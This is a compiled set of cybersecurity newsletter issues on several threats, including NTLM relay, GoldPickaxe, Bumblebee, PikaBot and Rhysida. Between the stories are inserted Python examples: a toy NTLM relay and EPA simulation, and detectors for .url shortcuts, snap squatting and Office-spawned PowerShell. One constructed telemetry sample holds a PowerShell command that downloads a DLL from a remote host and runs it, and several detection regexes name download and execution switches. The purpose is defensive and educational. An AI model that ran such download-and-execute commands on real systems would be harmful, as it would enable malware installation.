  • The attack is an NTLM relay: the attacker first targets an NTLM client such as Outlook with a credential-leaking bug, then relays the captured NTLM authentication to the Exchange server.

  • Redmond warns that successful exploitation lets the attacker authenticate to Exchange as the victim and perform operations on their behalf.

  • Microsoft's mitigation is Extended Protection for Authentication (EPA), which binds NTLM authentication to the TLS channel so that a relayed exchange fails. EPA is enabled by default in Exchange Server 2019 CU14; servers on earlier cumulative updates don't get it automatically and need it enabled explicitly.
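To show why EPA is the fix for a relay rather than just a hardening tick-box, here is an added example (not Microsoft's code and not the real NTLM wire format) in Python: a simplified model in which the client's proof covers the server challenge plus a channel-binding token derived from the TLS certificate the client actually connected to. The certificate bytes, user and password are constructed. With EPA off, the server only checks that the proof is valid for the challenge, so a relayed answer is accepted; with EPA on, it also checks that the binding names its own certificate, which a victim talking to the attacker's host never produces.

```python
"""Why Extended Protection for Authentication (EPA) stops NTLM relay.

Added example, not Microsoft's code and not the real NTLM wire format: a
simplified model in which the client's proof covers the server challenge plus
a channel-binding token (CBT) derived from the TLS certificate the client
actually connected to. Certificates, users and passwords are constructed.
"""
import hashlib
import hmac
import os
from typing import Optional

NO_BINDING = bytes(32)                  # sent when there is no TLS channel to bind to

REAL_CERT = b"constructed DER for the real Exchange certificate"
USERS = {"alice": "correct horse battery staple"}


def channel_binding_token(cert_der: bytes) -> bytes:
    """tls-server-end-point style binding: a hash of the server certificate the
    client's TLS session terminated on (simplified from the real construction)."""
    return hashlib.sha256(b"tls-server-end-point:" + cert_der).digest()


def credential_key(password: str) -> bytes:
    """Stand-in for the NT hash / NTLMv2 key derived from the user's password."""
    return hashlib.sha256(password.encode("utf-8")).digest()


def client_authenticate(password: str, challenge: bytes, cert_seen: Optional[bytes]):
    """Client (e.g. Outlook): answer the server challenge with a MAC that also
    covers the binding to whatever certificate the client saw. Returns the
    binding field and the proof; both travel to the server."""
    cbt = channel_binding_token(cert_seen) if cert_seen is not None else NO_BINDING
    proof = hmac.new(credential_key(password), challenge + cbt, hashlib.sha256).digest()
    return cbt, proof


class ExchangeLikeServer:
    def __init__(self, cert_der: bytes, users: dict, require_epa: bool):
        self.cert_der = cert_der
        self.users = users
        self.require_epa = require_epa

    def new_challenge(self) -> bytes:
        return os.urandom(8)

    def verify(self, user: str, challenge: bytes, cbt_field: bytes, proof: bytes) -> bool:
        password = self.users.get(user)
        if password is None:
            return False
        expected = hmac.new(credential_key(password), challenge + cbt_field, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, proof):
            return False                      # wrong password, or binding field tampered with
        if self.require_epa:
            # EPA: the binding the client committed to must name THIS server's certificate.
            return hmac.compare_digest(cbt_field, channel_binding_token(self.cert_der))
        return True                           # EPA off: the binding is never checked


def honest_login(server: ExchangeLikeServer, user: str, password: str) -> bool:
    chal = server.new_challenge()
    cbt, proof = client_authenticate(password, chal, server.cert_der)
    return server.verify(user, chal, cbt, proof)


def relay_attack(server: ExchangeLikeServer, victim: str, victim_password: str,
                 attacker_cert: Optional[bytes]) -> bool:
    """The attacker coerces the victim's NTLM client to authenticate to a host
    it controls and forwards the messages to the real server. The attacker never
    learns the password; it is passed here only so we can simulate the victim
    computing its answer. attacker_cert=None models coercion over a channel
    with no TLS binding at all."""
    chal = server.new_challenge()                           # forwarded to the victim unchanged
    cbt, proof = client_authenticate(victim_password, chal, attacker_cert)
    return server.verify(victim, chal, cbt, proof)           # victim's answer replayed as-is


if __name__ == "__main__":
    for epa in (False, True):
        srv = ExchangeLikeServer(REAL_CERT, USERS, require_epa=epa)
        print(f"EPA={epa}: honest={honest_login(srv, 'alice', USERS['alice'])} "
              f"relay={relay_attack(srv, 'alice', USERS['alice'], b'attacker cert')}")
```

The binding field sits under the MAC, so the attacker cannot strip or rewrite it without invalidating the proof; that is the whole trick, and it is why a server that merely supports EPA but does not require it gains nothing.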

Potential Threat Actors

While specific details of the exploitation are unclear, Russian state-affiliated groups like APT28 have a history of similar attacks.

Trend Micro implicates APT28 in NTLM relay attacks targeting various high-value sectors since April 2022.

Stay vigilant and update systems promptly!

Now, on to today's hottest cybersecurity stories:

  • Deepfakes employed by Chinese hackers in mobile banking attacks

  • UPDATE: Atlassian vulnerability to blame in January's GAO breach

  • Move over Turla. Meet Tiny Turla, coming to a Polish NGO near you

You heard about the Chinese godfather? He made them an offer they couldn't understand.

GoldFactory: Masterminds Behind Sophisticated Mobile Banking Trojans

A Chinese-speaking threat actor group known as GoldFactory has been identified as the brains behind a family of advanced banking trojans, including a newly discovered iOS malware named GoldPickaxe.

GoldPickaxe exists for both iOS and Android and harvests identity documents, records the victim's face and intercepts SMS messages. The group is believed to have close ties to Gigabud and has been active since mid-2023, primarily targeting the Asia-Pacific region, particularly Thailand and Vietnam.

The malware is distributed through smishing and phishing campaigns. Android variants are often hosted on counterfeit websites mimicking Google Play Store pages, while the iOS version abuses Apple's TestFlight platform and booby-trapped URLs to trick users into installing rogue apps.

Notably, GoldPickaxe for iOS sidesteps the facial-recognition step banks use to confirm transactions: the face video it records from the victim can be used to produce a deepfake that passes the check. Both Android and iOS variants collect ID documents, intercept SMS messages and proxy traffic through the infected device, which together can enable unauthorised fund transfers.

While the iOS variant is limited by Apple's closed ecosystem, the Android version, an evolution of GoldDiggerPlus, targets over 20 applications to steal credentials. It abuses Android's accessibility services to log keystrokes and extract on-screen content.

GoldFactory's arsenal also includes GoldDigger, which targets Vietnamese financial apps, and GoldKefu, an embedded trojan used in conjunction with GoldDiggerPlus to steal banking credentials. These trojans use tactics like fake overlays and fake bank alerts to deceive victims.

To mitigate these threats, users are advised to avoid clicking on suspicious links, install apps only from trusted sources, and review app permissions regularly (an app that asks for accessibility-service access without a clear reason is a red flag). GoldFactory's operational sophistication underscores the evolving landscape of mobile malware and the need for heightened cybersecurity measures.

They finally got to the bottom of it. At long Lassian.

Government Accountability Office (GAO) Breach

The Government Accountability Office (GAO) recently suffered a data breach affecting thousands of current and former employees, along with some affiliated companies, due to a vulnerability in the Atlassian Confluence collaboration tool.

The breach, disclosed by GAO contractor CGI Federal, impacted approximately 6,600 individuals, primarily GAO employees from 2007 to 2017. The vulnerability was being actively exploited, and access gained through it persists after the patch is applied: an attacker who got in before patching is not evicted by the update alone, so affected systems needed to be checked for unauthorised access as well as patched.

Despite a CISA advisory in October warning of the vulnerability, there was a three-month gap before GAO was notified in January 2024. CGI Federal has since taken remediation actions and is collaborating with authorities to address the breach.

Atlassian, the provider of Confluence, alerted customers promptly and emphasised the importance of immediate action to safeguard data. The GAO is conducting an investigation into the breach's cause and plans to provide identity theft monitoring services to affected individuals.

This incident underscores the critical importance of timely vulnerability management and proactive cybersecurity measures to protect sensitive data from evolving threats.

Catch of the Day!!

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

NGOh-no!

Turla Threat Actor Strikes with TinyTurla-NG Backdoor

A recent campaign targeting Polish non-governmental organisations has shed light on the activities of the Russia-linked threat actor Turla, known for its association with the Federal Security Service (FSB).

Cisco Talos has uncovered a new backdoor dubbed TinyTurla-NG, reminiscent of the previously documented TinyTurla implant. These "last chance" backdoors serve as a failsafe for the threat actor when other access methods have been compromised or detected.

This actor, also known by various aliases, including Iron Hunter and Snake, has a history of targeting defence sectors in Ukraine and Eastern Europe. In this latest campaign, TinyTurla-NG was observed in operation from December 2023 to January 2024, using compromised WordPress sites as command-and-control servers, which lets its traffic blend in with ordinary web browsing.

The backdoor allows remote command execution via PowerShell or Command Prompt, file download and upload, and execution of further scripts. Particularly concerning is the deployment of PowerShell scripts like TurlaPower-NG, designed to exfiltrate the password database files of popular password management software, which are then only as safe as the master password protecting them.

This revelation coincides with reports of Russian nation-state actors exploring advanced AI tools, including large language models like ChatGPT, to research satellite communication protocols and radar imaging technologies.

As threat actors continue to evolve their tactics, organisations must remain vigilant and bolster their cybersecurity defences to safeguard against sophisticated cyber threats.


Let us know what you think.

So long and thanks for reading all the phish!


Prudential Financial suffers breach in data theft cyber attack


Welcome to Gone Phishing, your daily cybersecurity newsletter that never misses a beat, a beep, or a tweet when it comes to all things cyber.

Today's hottest cybersecurity news stories:

  • Prudential Financial suffers breach in data theft cyber attack

  • DarkMe delivered via Microsoft SmartScreen flaw, victimises traders

  • Don't be fooled by 'command-not-found' tool sweeping Ubuntu

Wasn't very Prudent, was it...

๐Ÿฆ Prudential Financial Breach: Employee and Contractor Data Compromised ๐Ÿ›ก๏ธ

Prudential Financial, a global financial services giant managing $1.4 trillion in assets, reported a network breach last week. ๐ŸŒ

Attackers accessed some systems on February 4th, but Prudential detected and blocked them by February 5th. ๐Ÿ”’

The breach affected administrative and user data, including accounts linked to employees and contractors. Prudential suspects a cybercrime group behind the intrusion. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Although the breach hasn't impacted operations yet, Prudential notified authorities and initiated an investigation. They haven't found evidence of customer data compromise so far. ๐Ÿ’ผ

This incident follows a similar breach in May 2023, where over 320,000 customer records were exposed due to a breach in a third-party vendor's platform. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Prudential continues to investigate, emphasising its commitment to data security and customer privacy. Stay tuned for further updates. ๐Ÿšจ๐Ÿ”


#DarkMeToo

Zero-Day Exploit in Microsoft Defender SmartScreen Exploited by Water Hydra

A newly disclosed security flaw in Microsoft Defender SmartScreen has been exploited by an advanced persistent threat actor, Water Hydra, targeting financial market traders.

The flaw, CVE-2024-21412, allows attackers to bypass SmartScreen's security checks by sending victims a specially crafted Internet Shortcut (.url) file and convincing them to click on it.

Trend Micro has tracked the campaign since late December 2023, documenting the use of the exploit to distribute DarkMe malware via booby-trapped URLs posted in forex trading forums.

The attack abuses the Windows search application protocol (search-ms:) and chains Internet Shortcut files together: the first .url file the victim opens points to another .url file on an attacker-controlled share, and that nested shortcut is opened without the SmartScreen warning a downloaded file would normally trigger.
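To see what such a chain looks like on disk, here is an added example in Python (not code from the original newsletter or from Trend Micro) that parses the INI-style .url format and flags targets using the search-ms: protocol, pointing at a remote file share, or chaining to another shortcut or executable, the three ingredients the campaign described here and in the Patch Tuesday write-up of CVE-2024-21412 relies on. The sample shortcut contents and the host 203.0.113.10 are constructed for illustration.

```python
"""Classify Windows Internet Shortcut (.url) files by what their target would do.

Added example, not code from the original newsletter or from Trend Micro.
The sample shortcut contents and the host 203.0.113.10 are constructed.
"""
import configparser
import re
from urllib.parse import urlsplit

# Targets that chain to another shortcut or straight to executable content.
CHAIN_EXTENSIONS = (".url", ".lnk", ".exe", ".dll", ".js", ".vbs", ".hta", ".msi")
SEARCH_SCHEMES = {"search-ms", "search"}
UNC_HOST_RE = re.compile(r"\\\\([^\\\s&]+)")      # \\host\share -> host

SAMPLES = {  # constructed .url file contents
    "benign.url": "[InternetShortcut]\r\nURL=https://example.com/\r\n",
    "remote_smb.url": (
        "[InternetShortcut]\r\n"
        "URL=file://203.0.113.10/share/photo.jpg.url\r\n"
    ),
    "search_ms.url": (
        "[InternetShortcut]\r\n"
        "URL=search-ms:query=report&crumb=location:\\\\203.0.113.10\\share&displayname=Downloads\r\n"
    ),
    "webdav.url": (
        "[InternetShortcut]\r\n"
        "URL=\\\\203.0.113.10@80\\share\\chart.url\r\n"
    ),
}


def analyze_url_file(text: str) -> dict:
    """Parse one .url file and return its target, the remote host it reaches
    for (if any), the risk flags raised, and a block/allow verdict."""
    cfg = configparser.ConfigParser(interpolation=None)  # URLs contain '%'
    cfg.read_string(text)
    url = cfg.get("InternetShortcut", "URL", fallback="").strip()
    flags, remote_host = [], None

    if url.startswith("\\\\"):                       # bare UNC path, e.g. \\host@80\share (WebDAV)
        scheme, path = "unc", url
        m = UNC_HOST_RE.match(url)
        remote_host = m.group(1) if m else None
        flags.append("remote-share")
    else:
        parts = urlsplit(url)
        scheme, path = parts.scheme.lower(), parts.path
        if scheme in SEARCH_SCHEMES:                 # Windows Search protocol handler
            flags.append("search-protocol")
            m = UNC_HOST_RE.search(url)              # crumb=location:\\host\share
            remote_host = m.group(1) if m else None
            if remote_host:
                flags.append("remote-share")
        elif scheme == "file":
            if parts.netloc:                         # file://host/... is a remote share, not a local file
                remote_host = parts.netloc
                flags.append("remote-share")
        elif scheme not in ("http", "https"):
            flags.append("unusual-scheme")

    if path.lower().rstrip("/").endswith(CHAIN_EXTENSIONS):
        flags.append("chained-shortcut")

    blocking = {"remote-share", "search-protocol", "chained-shortcut"}
    verdict = "block" if blocking.intersection(flags) else "allow"
    return {"url": url, "scheme": scheme, "remote_host": remote_host,
            "flags": flags, "verdict": verdict}


def scan_samples(samples: dict = SAMPLES) -> dict:
    """Verdict per sample file name."""
    return {name: analyze_url_file(body)["verdict"] for name, body in samples.items()}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, analyze_url_file(body))
```

Run it over a mail gateway's attachment quarantine or a download directory and the interesting cases are exactly the ones a user would never notice: a .url that looks like a photo but resolves to a second shortcut on somebody else's share.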

Despite Microsoft addressing the flaw in its February Patch Tuesday update, the incident highlights the growing sophistication of cybercrime groups and the increasing risk of zero-day exploits being incorporated into advanced attack chains.

Stay vigilant and ensure your systems are up to date to mitigate such threats.

Catch of the Day!!

The Motley Fool: "Fool me once, shame on... shame on you. Fool me... you can't get fooled again." Good ol' George Dubya. Let us tell you who's not fooling around though; that's the Crüe at Motley Fool. You'd be a fool (alright, enough already!) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! Kidding aside, if you check out their website they've actually got a ton of great content with a wide variety of different investment ideas to suit most budgets. (LINK)

Wander: Find your happy place. Cue Happy Gilmore flashback. Mmmm, Happy Place... So, we've noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the Free and the Home of the Brave is news of rioting, looting and school shootings, it's easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels set Wander apart from your run-of-the-mill American getaway. (LINK)

Digital Ocean: If you build it they will come. Nope, we're not talking about a baseball field for ghosts (great movie, to be fair). This is Digital Ocean, who've got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website you'll find yourself catching the buzz even if you can't code (guilty). But if you can and you're looking for somewhere to test things out or launch something new or simply enhance what you've got, we'd recommend checking out their services fo' sho'. And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! (LINK)

Ubuntu forget but you ought to remember

Ubuntu Systems Vulnerable to Rogue Package Recommendations

Cybersecurity researchers have discovered a weakness in Ubuntu's "command-not-found" utility that could allow threat actors to get malicious packages recommended to users, compromising systems running Ubuntu.

The utility, installed by default on Ubuntu systems, suggests packages to install when a user types a command that isn't available. Its suggestions come from two sources, the APT package database and the snap store, and an attacker who publishes a snap whose name (or command alias) matches a command users are likely to mistype or expect can get command-not-found to recommend it, turning a helpful hint into a software supply chain attack.

Aqua found that the alias mechanism can be exploited to register a snap name associated with an alias, tricking users into installing malicious packages. Furthermore, the commands of legitimate APT packages can be impersonated: Aqua estimates that as many as 26% of APT package commands are vulnerable to impersonation, because their names are valid snap names that nobody has registered yet.

To mitigate this risk, users are advised to verify a package's source before installing a suggestion (for a snap, check the publisher shown by snap info rather than trusting the name alone), while developers of APT and snap packages should register the associated snap names so that nobody else can. Vigilance and proactive defence strategies are crucial in light of this threat.
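For maintainers who want to check their own exposure, here is an added example in Python (not Aqua's tooling and not part of command-not-found) that classifies each APT-provided command by whether its name could be squatted in the snap store. The command list and the snap registry are constructed stand-ins for what you would gather from the command-not-found database and from snap info; the snap naming rule encoded in the regex is my understanding of the store's constraints and is labelled an assumption in the code.

```python
"""Audit which APT-provided commands could be impersonated through the snap
store, the exposure Aqua describes for Ubuntu's command-not-found.

Added example, not Aqua's tooling and not part of command-not-found. The
APT command list and the snap registry below are constructed stand-ins for
what you would gather from the command-not-found database and 'snap info'.
"""
import re

# Snap naming rule as I understand it (assumption): lowercase letters, digits
# and single hyphens, no leading/trailing hyphen, at least one letter, <= 40 chars.
SNAP_NAME_RE = re.compile(r"(?=.*[a-z])[a-z0-9]+(?:-[a-z0-9]+)*")


def is_registrable_snap_name(name: str) -> bool:
    return len(name) <= 40 and SNAP_NAME_RE.fullmatch(name) is not None


# Constructed: command -> the APT package that provides it and who maintains it upstream.
APT_COMMANDS = {
    "tcpdump":    {"package": "tcpdump",    "upstream": "the-tcpdump-group"},
    "ncat":       {"package": "ncat",       "upstream": "nmap-project"},
    "john":       {"package": "john",       "upstream": "openwall"},
    "weird_tool": {"package": "weird-tool", "upstream": "example-org"},
}

# Constructed: snap name -> (publisher id, publisher verified?), as 'snap info' would show.
SNAP_REGISTRY = {
    "tcpdump": ("the-tcpdump-group", True),
    "john":    ("random-user-1234", False),
}


def classify(command: str, apt_entry: dict, snap_registry: dict) -> str:
    """One of:
    not-registrable  - the name cannot be a snap name, so it cannot be squatted by name
    ok               - a snap with this name exists and its verified publisher is the upstream
    suspect          - a snap with this name exists from an unrelated or unverified publisher
    unclaimed        - no snap uses this name yet; the maintainer should register it
    """
    if not is_registrable_snap_name(command):
        return "not-registrable"
    if command not in snap_registry:
        return "unclaimed"
    publisher, verified = snap_registry[command]
    if publisher == apt_entry["upstream"] and verified:
        return "ok"
    return "suspect"


def audit(apt_commands: dict = APT_COMMANDS, snap_registry: dict = SNAP_REGISTRY) -> dict:
    """Classify every APT-provided command and return {command: status}."""
    return {cmd: classify(cmd, entry, snap_registry) for cmd, entry in apt_commands.items()}


def exposure_ratio(results: dict) -> float:
    """Share of commands an attacker could still grab by name (unclaimed) or
    may already have grabbed (suspect), the kind of figure behind Aqua's 26%."""
    exposed = sum(1 for s in results.values() if s in ("unclaimed", "suspect"))
    return exposed / len(results) if results else 0.0


if __name__ == "__main__":
    res = audit()
    for cmd, status in res.items():
        print(f"{cmd:12} {status}")
    print(f"exposed: {exposure_ratio(res):.0%}")
```

The "unclaimed" bucket is the one to act on first: registering the name (even for an empty placeholder snap) closes the door, whereas "suspect" needs a human to decide whether the publisher is a legitimate third-party packager or a squatter.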

That's all for today, folks. Don't be thick when you click.


Let us know what you think!

So long and thanks for reading all the phish!

PikaBot has reared its ugly head


Welcome to Gone Phishing, your daily cybersecurity newsletter that can't wait until cybercrime is sooooo last season #NewYorkFashionWeek

Today's hottest cybersecurity news stories:

  • PikaBot has reared its ugly head again with new code, tactics

  • Glupteba botnet uses mysterious UEFI bootkit to hide in plain sight

  • Bumblebee malware is once again a buzzing hive of cyber activity

Phew, the coast is clear... PikaBOT!!!

PikaBot Malware: Devolution Detected

The PikaBot malware, first spotted in May 2023, has undergone significant changes, described as a "devolution" by Zscaler ThreatLabz researcher Nikolaos Pantazopoulos.

In a recent analysis, researchers found that PikaBot's latest version (1.18.32) has simplified both its code and its network communications. This includes dropping advanced obfuscation techniques and switching to simpler encryption algorithms.

Notably, PikaBot now stores its entire bot configuration in plaintext, a departure from the encrypted configurations of earlier versions, and its command-and-control (C2)  communications have been modified.

Despite recent inactivity, PikaBot remains a potent threat and is still under active development; its developers, however, currently favour a less complex approach and have removed advanced obfuscation features. The practical upshot for defenders is that current builds are easier to analyse, but detection signatures tuned to the old obfuscation and C2 format will need updating.

This development coincides with warnings about an ongoing cloud account takeover (ATO) campaign targeting Microsoft Azure environments, compromising hundreds of user accounts.

As cyber threats evolve, vigilance and proactive security measures are crucial to safeguarding against emerging risks. Stay updated and stay safe!


UEFI Bootkit: These aren't the bots you're looking for

Glupteba Botnet: Adding UEFI Bootkit for Stealth

Recent analysis by Palo Alto Networks Unit 42 researchers uncovered a new twist in the Glupteba botnet saga: the integration of a previously undocumented Unified Extensible Firmware Interface (UEFI) bootkit feature.

The bootkit gives Glupteba control of the operating system boot process, so it runs before the OS and its security tooling load, which makes detection and removal considerably harder. It enhances the malware's persistence and stealth and further complicates defence efforts.

Glupteba is already a formidable threat, functioning as an information stealer, backdoor and cryptocurrency miner. It uses the Bitcoin blockchain to distribute command-and-control (C2) addresses, which makes the infrastructure hard to take down because the C2 addresses cannot be removed from the public ledger.

Notably, Glupteba's distribution involves complex infection chains, often starting with PrivateLoader or SmokeLoader infections that pave the way for subsequent malware families, ultimately leading to Glupteba.

This malware ecosystem has evolved over the years, with Glupteba now using its UEFI bootkit to disable Windows security features like PatchGuard and Driver Signature Enforcement (DSE) during boot-up, which in turn lets it load an unsigned kernel driver.

The researchers emphasised the malware's adaptability and innovation, highlighting its role in mass infections and collaboration within the cybercriminal ecosystem. Glupteba continues to pose a significant threat, showcasing the evolving landscape of modern cybercrime.


Hackers be like float like a butterfly, sting like a Bumblebee

Bumblebee Malware Buzzes Back with Fresh Tactics

After a four-month hiatus, Bumblebee malware has reappeared on the cyber threat landscape, sporting a revamped attack chain, according to recent findings.

The latest campaign, observed in February 2024, shows a "significantly different" modus operandi compared to previous campaigns, and coincides with the return of several notorious threat actors following a winter lull.

Bumblebee is a sophisticated downloader used by initial access brokers; it fetches and executes follow-on payloads such as Cobalt Strike, shellcode, Sliver and Meterpreter.

From March 2022 to October 2023, 230 Bumblebee campaigns were documented, with threat actors using creative distribution methods, including trojanised copies of popular software like Zoom and Cisco AnyConnect.

In this latest iteration, social engineering takes centre stage: the attackers entice victims to download Bumblebee via emails spoofing consumer electronics firm Humane.

The bait? A voicemail-themed lure containing OneDrive URLs that lead to Word documents carrying VBA macros.

Once the macros run, they launch a PowerShell command that fetches the next stage from a remote server, ultimately leading to the deployment of the Bumblebee DLL.
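The chain just described (macro-enabled Word document, PowerShell fetching a payload, a dropped DLL) is also what makes this campaign catchable in process telemetry. Here is an added example in Python (not Proofpoint's or anyone else's detection content) that walks constructed Sysmon-style process-creation events and scores an Office application spawning PowerShell, escalating when a descendant rundll32 loads a DLL from a user-writable directory. It assumes the DLL is launched via rundll32, which is common but not the only way to run a dropped DLL; the host 198.51.100.7 and every file name are invented for the sample.

```python
"""Spot the document -> PowerShell -> DLL chain in process-creation telemetry.

Added example, not Proofpoint's or anyone else's detection content. The
events below are constructed Sysmon-style process-creation records; the host
198.51.100.7 and the file names are invented for the sample.
"""
import re
from collections import defaultdict

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\", "\\programdata\\")

# Command-line traits worth scoring on their own; matched against the lower-cased command line.
PS_PATTERNS = {
    "download": re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|\bcurl\b|\bwget\b"),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden"),
    "policy-bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass"),
    "encoded-command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}"),
    "in-memory-exec": re.compile(r"\biex\b|invoke-expression|frombase64string"),
}
DOC_RE = re.compile(r'"([^"]+\.(?:docm?|dotm?|xlsm?|pptm?))"', re.IGNORECASE)

EVENTS = [  # constructed process-creation events
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "command_line": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\alice\Downloads\voicemail_2024-02.docm"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -w hidden -ep bypass -c "Invoke-WebRequest http://198.51.100.7/update.txt -OutFile $env:TEMP\update.dll; rundll32.exe $env:TEMP\update.dll,Start"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'rundll32.exe "C:\Users\alice\AppData\Local\Temp\update.dll",Start'},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c Get-ChildItem C:\\Users\\alice"},   # admin at the console, not from Office
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},  # ordinary system use
]


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_chains(events: list) -> list:
    """Return one finding per PowerShell process spawned by an Office app.
    Severity: medium (Office -> PowerShell), high (plus suspicious switches),
    critical (plus a descendant rundll32 loading a DLL from a user-writable path)."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])

    findings = []
    for e in events:
        if image_name(e["image"]) not in SHELLS:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or image_name(parent["image"]) not in OFFICE_APPS:
            continue
        cmd = e["command_line"].lower()
        indicators = [name for name, rx in PS_PATTERNS.items() if rx.search(cmd)]
        severity = "high" if indicators else "medium"
        chain = [parent["pid"], e["pid"]]

        # Walk the descendants looking for rundll32 loading a DLL from a user-writable directory.
        stack = list(children[e["pid"]])
        while stack:
            pid = stack.pop()
            d = by_pid[pid]
            dcmd = d["command_line"].lower()
            if (image_name(d["image"]) == "rundll32.exe" and ".dll" in dcmd
                    and any(p in dcmd for p in USER_WRITABLE)):
                chain.append(pid)
                severity = "critical"
                break
            stack.extend(children[pid])

        doc = DOC_RE.search(parent["command_line"])
        findings.append({"severity": severity, "chain": chain, "indicators": indicators,
                         "document": doc.group(1) if doc else None})
    return findings


if __name__ == "__main__":
    for finding in detect_chains(EVENTS):
        print(finding)
```

The parent-child relationship does the heavy lifting: an administrator running PowerShell from the console is ignored, and the noisy keyword matches only raise the score once Word is already the parent, which keeps false positives down without relying on any hash or domain that the next campaign will rotate.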

What's noteworthy is the return of VBA macro-enabled documents to the attack chain, a deviation from recent trends: since Microsoft began blocking macros in files downloaded from the internet by default, most crews had moved to other formats, so a macro lure only works if the victim is talked into enabling them.

While the campaign remains unattributed, similarities in techniques suggest a possible connection to the TA579 group. Other tracked threat actors, like TA577, have also resumed activities, signalling a return to high operational tempo in 2024.

As cybercriminals ramp up their efforts, we anticipate a continuation of these trends, urging heightened vigilance and proactive defence measures in the face of evolving threats.

Stay safe out there, folks!


Let us know what you think!

So long and thanks for reading all the phish!

$10M bounty offered by U.S. for information on Hive ransomware leaders


Welcome to Gone Phishing, your daily cybersecurity newsletter that wonders whether the hackers could get from London to New York with no ticket or passport.

Today's hottest cybersecurity news stories:

  • $10M bounty offered by U.S. for info on Hive ransomware leaders

  • Yay! Decryption tool released to dismantle Rhysida ransomware

  • CISA, OpenSSF release framework for package repository security

That's quite the honey pot. But it's none of our beeswax.

U.S. Offers Up to $10 Million Bounty for Hive Ransomware Operatives

The U.S. Department of State has announced rewards of up to $10 million for information leading to the identification or location of individuals holding key leadership positions within the Hive ransomware operation. An additional $5 million is on offer for information leading to the arrest or conviction of anyone conspiring to participate, or attempting to participate, in Hive ransomware activity.

The announcement comes on the heels of a significant law enforcement effort that infiltrated and dismantled the darknet infrastructure of the Hive ransomware-as-a-service (RaaS) gang over a year ago, and the arrest of one suspect in Paris in December 2023.

Hive, which surfaced in mid-2021, targeted over 1,500 victims across 80 countries, amassing approximately $100 million in illicit gains. Following the takedown, a new ransomware group dubbed Hunters International emerged, having acquired Hive's source code and infrastructure to kick-start its own operation.

Evidence suggests that Hunters International may have ties to Nigeria, possibly linked to an individual named Olowo Kehinde. However, the true origins remain obscured, and the trail may well be a deliberate false flag.

The surge in ransomware activity in 2023, as highlighted by blockchain analytics firm Chainalysis, underscores the growing threat posed by cybercriminals. With a resurgence in attacks and a surge in new entrants to the ransomware ecosystem, the landscape has become increasingly perilous.

Amidst these challenges, cybersecurity experts emphasise the importance of vigilance and rapid response strategies to limit the impact of an intrusion, including tested offline backups so that a ransomware attack does not have to end in a ransom payment.


I Rhysida but I don't believe her

Implementation Vulnerability Exposes Rhysida Ransomware's Weakness

Cybersecurity researchers from Kookmin University and the Korea Internet and Security Agency (KISA) have achieved a significant breakthrough in the fight against ransomware. Their discovery of an "implementation vulnerability" in Rhysida ransomware has enabled the reconstruction of its encryption keys and the decryption of locked data.

The findings, published recently, mark the first successful decryption of Rhysida ransomware since its emergence in May 2023. A recovery tool developed as a result of this breakthrough is now being distributed by KISA, offering hope to victims of this malicious software.

This breakthrough is part of a growing trend in the cybersecurity community, where researchers have decrypted ransomware by exploiting implementation vulnerabilities. Rhysida joins the ranks of ransomware strains such as Magniber v2, Ragnar Locker, Avaddon and Hive, which have been decrypted using similar methods.

Rhysida ransomware, known for its ties to the Vice Society ransomware crew, employs a double extortion tactic, threatening to release stolen data to coerce victims into paying. Targeting sectors such as education, manufacturing, information technology and government, Rhysida has been flagged by the U.S. government for its opportunistic attacks.

A detailed analysis of Rhysida's encryption process reveals its use of LibTomCrypt and parallel processing to accelerate encryption. The ransomware also uses intermittent encryption, encrypting only parts of each file, to speed things up and evade detection by security solutions.

Key to the researchers' success was the discovery that Rhysida generates its encryption keys from a cryptographically secure pseudo-random number generator (CSPRNG) based on the ChaCha20 algorithm, but seeds that generator with a value correlated to the time the ransomware ran. A CSPRNG is only as unpredictable as its seed: by narrowing down the execution time, the researchers could enumerate candidate seeds, regenerate the random stream, and recover the keys used to encrypt each file.
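To make the "predictable seed" point concrete, here is an added example in Python that is not Rhysida's scheme and not the researchers' tool: a toy file encryptor whose per-file key is derived from a time-based seed, and a recovery routine that brute-forces the seed from the file's timestamp and checks each candidate against a known file header. Rhysida uses LibTomCrypt's ChaCha20-based generator; the toy uses a SHA-256 counter stream so that it runs with the standard library alone. The document bytes and the timestamps are constructed.

```python
"""Why a CSPRNG seeded from the clock is recoverable: a toy file encryptor
whose key is derived from a time-based seed, and a recovery routine that
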